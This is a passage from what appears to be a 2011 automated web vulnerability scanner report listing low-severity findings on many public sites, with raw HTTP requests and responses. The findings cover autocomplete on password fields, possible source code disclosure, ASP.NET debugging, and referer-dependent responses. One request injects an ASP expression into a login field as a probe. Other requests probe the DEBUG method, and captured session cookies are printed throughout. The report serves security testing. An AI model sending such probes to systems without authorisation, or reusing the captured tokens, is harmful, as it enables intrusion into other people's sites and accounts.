<td><input type="password" name="loginpassword" class="loginpassword" value=""></td>
...[SNIP]...
18.298. http://support.trust-guard.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://support.trust-guard.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: support.trust-guard.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SWIFT_sessionid40=nnfa18si4n87mc68kwytxeynpprc2i1o; SWIFT_client=a%3A1%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid80=79aen2tq7o9d45p59q0nb8srhrs5qbvg; __utma=147269874.1166530582.1303748966.1303748966.1303758698.2; __utmc=147269874; __utmb=147269874.3.10.1303758698; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:12:04 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 14128


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"><html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<td bgcolor="#F5F5F5" colspan="4"><form name="loginform" action="http://support.trust-guard.com/index.php" method="POST"><table width="100%" border="0" cellspacing="1" cellpadding="2">
...[SNIP]...
<td><input type="password" name="loginpassword" value="" class="loginpassword"></td>
...[SNIP]...
18.299. http://support.trust-guard.com/index.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://support.trust-guard.com
Path:   /index.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /index.php?_m=troubleshooter&_a=view HTTP/1.1
Host: support.trust-guard.com
Proxy-Connection: keep-alive
Referer: http://support.trust-guard.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SWIFT_sessionid40=nnfa18si4n87mc68kwytxeynpprc2i1o; SWIFT_sessionid80=79aen2tq7o9d45p59q0nb8srhrs5qbvg; __utma=147269874.1166530582.1303748966.1303748966.1303758698.2; __utmc=147269874; __utmb=147269874.3.10.1303758698; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_client=a%3A1%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:12:49 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 12475


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"><html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-e
...[SNIP]...
<td bgcolor="#F5F5F5" colspan="4"><form name="loginform" action="http://support.trust-guard.com/index.php" method="POST"><table width="100%" border="0" cellspacing="1" cellpadding="2">
...[SNIP]...
<td><input type="password" name="loginpassword" value="" class="loginpassword"></td>
...[SNIP]...
18.300. https://support.trust-guard.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: support.trust-guard.com
Connection: keep-alive
Referer: https://secure.trust-guard.com/index.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147269874.1166530582.1303748966.1303748966.1303748966.1

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 18:58:36 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
X-Powered-By: PHP/5.2.17
Set-Cookie: SWIFT_sessionid40=6wpcfc08xikijf34l3vxhi68m4979l9c; path=/
Keep-Alive: timeout=2, max=200
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 14136


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"><html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<td bgcolor="#F5F5F5" colspan="4"><form name="loginform" action="https://support.trust-guard.com/index.php" method="POST"><table width="100%" border="0" cellspacing="1" cellpadding="2">
...[SNIP]...
<td><input type="password" name="loginpassword" value="" class="loginpassword"></td>
...[SNIP]...
18.301. https://support.trust-guard.com/index.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /index.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /index.php HTTP/1.1
Referer: https://support.trust-guard.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 18:59:05 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 14168


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"><html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<td bgcolor="#F5F5F5" colspan="4"><form name="loginform" action="https://support.trust-guard.com/index.php" method="POST"><table width="100%" border="0" cellspacing="1" cellpadding="2">
...[SNIP]...
<td><input type="password" name="loginpassword" value="" class="loginpassword"></td>
...[SNIP]...
18.302. https://system.netsuite.com/pages/customerlogin.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://system.netsuite.com
Path:   /pages/customerlogin.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /pages/customerlogin.jsp HTTP/1.1
Host: system.netsuite.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bn_u=6923519460848807096; mbox=session#1303736347554-914602#1303744342|PC#1303736347554-914602.17#1366814482|check#true#1303742542

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:14:13 GMT
Server: Apache
NS_RTIMER_COMPOSITE: 2015151527:616363742D6A6176613036392E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=661
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 49795


<!-- hosted from '/US/' on a.j69.sv running 2010.2.0.159 -->
<html>
<head>
<title>NetSuite - Customer Login</title>
<meta name="description" content="NetSuite provides a login page for
...[SNIP]...
<td width="237"><form method="post" action="https://system.netsuite.com/app/login/nllogin.nl">
<TABLE WIDTH="237" BORDER="0" CELLSPACING="0" CELLPADDING="0">
...[SNIP]...
<TD><INPUT TYPE="password" NAME="password" SIZE="30" BORDER="0" onKeyPress="if (event.keyCode == 13) {if(!checkEmpty()){return false;}document.forms[0].jsenabled.value = 'T';document.forms[0].submit(); return false; } return true;" tabindex="2"></TD>
...[SNIP]...
18.303. http://vkontakte.ru/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://vkontakte.ru
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: vkontakte.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Mon, 25 Apr 2011 14:23:04 GMT
Content-Type: text/html; charset=windows-1251
Connection: keep-alive
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: remixchk=5; expires=Tue, 17-Apr-2012 02:49:46 GMT; path=/; domain=.vkontakte.ru
Pragma: no-cache
Cache-control: no-store
Vary: Accept-Encoding
Content-Length: 12904

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<script type="
...[SNIP]...
<div id="quick_login">
<form method="POST" name="login" id="quick_login_form" action="http://login.vk.com/?act=login" onsubmit="if (vklogin) {return true} else {quick_login();return false;}">
<input type="hidden" name="act" value="login" />
...[SNIP]...
<div class="labeled"><input type="password" name="pass" class="text" onfocus="show('quick_expire')" id="quick_pass" /></div>
...[SNIP]...
18.304. http://www.integritydefender.com/account.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.integritydefender.com
Path:   /account.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /account.php HTTP/1.1
Host: www.integritydefender.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=da4c413fd2f41e463cb4aac35dcd5799

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:45:58 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 13118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<td valign="top" style="border-right:1px dotted #cccccc;">
               
           <form action="action/user-account-action.php" method="post" name="userAccountLogin" id="userAccountLogin" onsubmit="return validateLogin();" >
<div style="width:370px; padding-left:100px; padding-bottom:10px;">
...[SNIP]...
<td width="214" align="left" valign="middle"><input name="userPassword" type="password" id="userPassword" class="signin-textbox" /></td>
...[SNIP]...
18.305. http://www.livejournal.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.livejournal.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.livejournal.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Date: Mon, 25 Apr 2011 14:27:54 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-AWS-Id: ws24
ETag: "2973888db3f7f93cbba310f7bf86432d"
Vary: Accept-Encoding
Content-Language: en
X-Debug: USen gzip (null)
X-VWS-Id: bil1-varn03
X-Varnish: 307153447 307107722
Age: 292
Via: 1.1 varnish
Content-Length: 50232

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<
...[SNIP]...
<div class="lj_loginform" id="Login">
<form style='margin: 0; padding: 0;' method="post" action="https://www.livejournal.com/login.bml?ret=1" id="login" class="lj_login_form">

<input type='hidden' name='mode' value='login' />
...[SNIP]...
<td style='white-space: nowrap;'><input type="password" name="password" size="15" class="lj_login_password" tabindex="2" />
<input type='submit' value="Log in" tabindex='3' />
...[SNIP]...
18.306. http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.marketgid.com
Path:   /pnews/773204/i/7269/pp/2/1/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /pnews/773204/i/7269/pp/2/1/ HTTP/1.1
Host: www.marketgid.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MGformStatus=2; __utma=250877338.2141066310.1303423654.1303423654.1303423654.1; __utmz=250877338.1303423654.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/14|utmcmd=referral; __gads=ID=909f464f6199feed:T=1303423666:S=ALNI_MY6fIaxdoRzO_fDyTrK1Li9f5G69A; __qca=P0-972785183-1303423664935

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:31:32 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Keep-Alive: timeout=20
Cache-Control: no-cache, must-revalidate
Content-Length: 48728

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div class="menu_body" style="margin-bottom:5px">
<form id="mg-auth-form-1" action="http://usr.marketgid.com/creative/auth/" method="post">
<div>
...[SNIP]...
</div>
<input id="pass" type="password" name="pass" value=".........." size="25" tabindex="2" onfocus="form_change(this)" onblur="form_change(this)" /><input class="submit-button" type="submit" value="........" tabindex="3" />
...[SNIP]...
18.307. http://www.ripoffreport.com/LoginPage.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ripoffreport.com
Path:   /LoginPage.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /LoginPage.aspx HTTP/1.1
Host: www.ripoffreport.com
Proxy-Connection: keep-alive
Referer: http://www.ripoffreport.com/ConsumerResources.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=38277280.1303747675.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=38277280.797691246.1303747675.1303747675.1303747675.1; __utmc=38277280; __utmb=38277280.2.10.1303747675

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 16:25:18 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXAUTH=204DAD60EB1BBD88C59E5F5F9173063C696A0F7001F3DAB68B91E49725FD98FA9004A1B768AD6C5CCF6FC284A723C82A4AE351B51D920A7472D17715227F8C8F5EA7067B1EC089AE4B0F0AD2D9D779F79D62DB169E8EB4A2EDB1833E9FBFB093E1F7AA47EC45274B2DB2BA709F7D2D261236D9197EEE8A4CF97B216F06C285E994CAAB0AF14BE9CF81CF25F5779A8377F57F2E3A93FF28013B612CC450AC879DDF0FFF87E5F1BFA2EA945555182C4ADA; expires=Wed, 25-May-2011 16:13:07 GMT; path=/; HttpOnly
P3P: CP="NON DSP COR ADM DEV HIS OTPi OUR IND STA"
ROR-NODE: 09
Content-Length: 18684


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"
...[SNIP]...
<body>
<form name="aspnetForm" method="post" action="/LoginPage.aspx" id="aspnetForm">
<div>
...[SNIP]...
<td><input name="ctl00$ctl00$cphBodyTemplate$cphLeftMasterReport$Login1$PasswordTextbox" type="password" id="ctl00_ctl00_cphBodyTemplate_cphLeftMasterReport_Login1_PasswordTextbox" size="40" /></td>
...[SNIP]...
19. Source code disclosure  previous  next
There are 4 instances of this issue:

19.1. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

POST /hmc/report/index.cfm? HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Content-Length: 66

j_password=3&j_username=%3c%25+response.write(268409241-22)+%25%3e

Response

HTTP/1.1 100 Continue

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:04 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:04 GMT;path=/
Content-Language: en-
...[SNIP]...
<input name="j_username" type="text" tabindex="1" title="Username" size="25" maxlength="50" value="<% response.write(268409241-22) %>" onKeyPress="checkEnter();">
...[SNIP]...
19.2. http://l-files.livejournal.net/userapps/10/image  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://l-files.livejournal.net
Path:   /userapps/10/image

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /userapps/10/image HTTP/1.1
Host: l-files.livejournal.net
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Content-Type: text/plain
X-Varnish: 1354355956 1354352273
Via: 1.1 varnish
Age: 251968
Date: Mon, 25 Apr 2011 14:20:36 GMT
Last-Modified: Thu, 03 Feb 2011 11:13:43 GMT
Content-Length: 37341
Connection: keep-alive

......Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS5 Macintosh.2011:02:03 11:49:08.........................
...[SNIP]...
.&...vF]2w..Y%...M..;.*K....G..._....=...x._..'..8BIM.!.....U..........A.d.o.b.e. .P.h.o.t.o.s.h.o.p.....A.d.o.b.e. .P.h.o.t.o.s.h.o.p. .C.S.5.....8BIM...................bhttp://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">
...[SNIP]...
<?xpacket end="w"?>...XICC_PROFILE......HLino....mntrRGB XYZ .....    ...1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXY
...[SNIP]...
19.3. http://www.elineaccessories.com/static/js/int/public/jquery.iv.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.elineaccessories.com
Path:   /static/js/int/public/jquery.iv.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /static/js/int/public/jquery.iv.js HTTP/1.1
Host: www.elineaccessories.com
Proxy-Connection: keep-alive
Referer: http://www.elineaccessories.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: iv_live_session=c6a911051a17cb44bde902a831d084e0c28b9ba4

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:23:59 GMT
Server: Apache
Last-Modified: Wed, 10 Nov 2010 04:57:59 GMT
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Expires: Wed, 25 May 2011 19:23:59 GMT
Content-Type: application/x-javascript
Content-Length: 44485

// ===========================================================
// NOTE: ALL JQUERY IN THIS FILE MUST BE NO CONFLICT
// ===========================================================
(function(jQuery) {

...[SNIP]...
image_hash);
return false;
});
});
}
else{
// This will use animated lightbox.
jQuery(function() {
// jQuery('#photogallery_container_<% $photogallery_id %> img[rel*="lightbox"]').lightBox(lightbox_hash);
var lightbox_hash = {
txtImage : options.txtImage,
txtOf : options.txtOf,
showDescriptio
...[SNIP]...
n false;
});
});

}
else{
// This will use animated lightbox.
jQuery(function() {
// jQuery('#photogallery_container_<% $photogallery_id %> img[rel*="lightbox"]').lightBox(lightbox_hash);
var lightbox_hash = {
txtImage : options.txtImage,
txtOf : options.txtOf,

...[SNIP]...
19.4. http://www.netsuite.com/portal/javascript/NLPortal.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.netsuite.com
Path:   /portal/javascript/NLPortal.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /portal/javascript/NLPortal.js HTTP/1.1
Host: www.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/page_not_found.shtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=session#1303736347554-914602#1303743997|PC#1303736347554-914602.17#1304951737|check#true#1303742197; NS_VER=2011.1.0

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 50687
Content-Disposition: inline;filename="NLPortal.js"
NS_RTIMER_COMPOSITE: 1229137097:73686F702D6A6176613030312E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=T
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Content-Type: application/octet-stream; charset=utf-8
Cache-Control: max-age=2534
Date: Mon, 25 Apr 2011 14:40:40 GMT
Connection: close

function getBaseDomain()
{
var domain = document.domain;
var ifirst= domain.indexOf(".");
domain=domain.substring(ifirst+1);        
return domain;
}

// for netcrm the appdomain is netsuite
...[SNIP]...
&& partner.length > -1)
{
var vCookieVals = partner.split(",");
partner = vCookieVals[1];
//document.cookie = "visitorCookie; path=/portal/; domain="www.<%=NLConfig.getSystemDomain()%>"; expires=Fri, 02-Jan-1970 00:00:00";
// setCookie("visitorCookie", null, null, , "www.<%=NLConfig.getSystemDomain()%>", secure)
if(partner != null && partner != "")
setCookie("partner", partner, "/", null, getBaseDomain(), null)
}
}

//return null if no partner code exi
...[SNIP]...
20. ASP.NET debugging enabled  previous  next
There are 2 instances of this issue:

20.1. http://counter.hitslink.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://counter.hitslink.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: counter.hitslink.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Mon, 25 Apr 2011 16:03:34 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.
20.2. http://ideco-software.ru/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ideco-software.ru
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: ideco-software.ru
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Mon, 25 Apr 2011 14:36:05 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
Connection: Close
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=windows-1251
Content-Length: 39

Debug access denied to '/Default.aspx'.
21. Referer-dependent response  previous  next
There are 13 instances of this issue:

21.1. http://pixel.fetchback.com/serve/fb/pdc  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Request 1

GET /serve/fb/pdc?cat=&name=landing&sid=719 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/page_not_found.shtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1303696672_1660:517000; uid=1_1303696672_1303179323923:6792170478871670; kwd=1_1303696672; sit=1_1303696672_2451:5100:0_3236:163063:162945_782:517349:517000; cre=1_1303696672; bpd=1_1303696672; apd=1_1303696672; scg=1_1303696672; ppd=1_1303696672; afl=1_1303696672

Response 1

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:13:57 GMT
Server: Apache/2.2.3 (Red Hat)
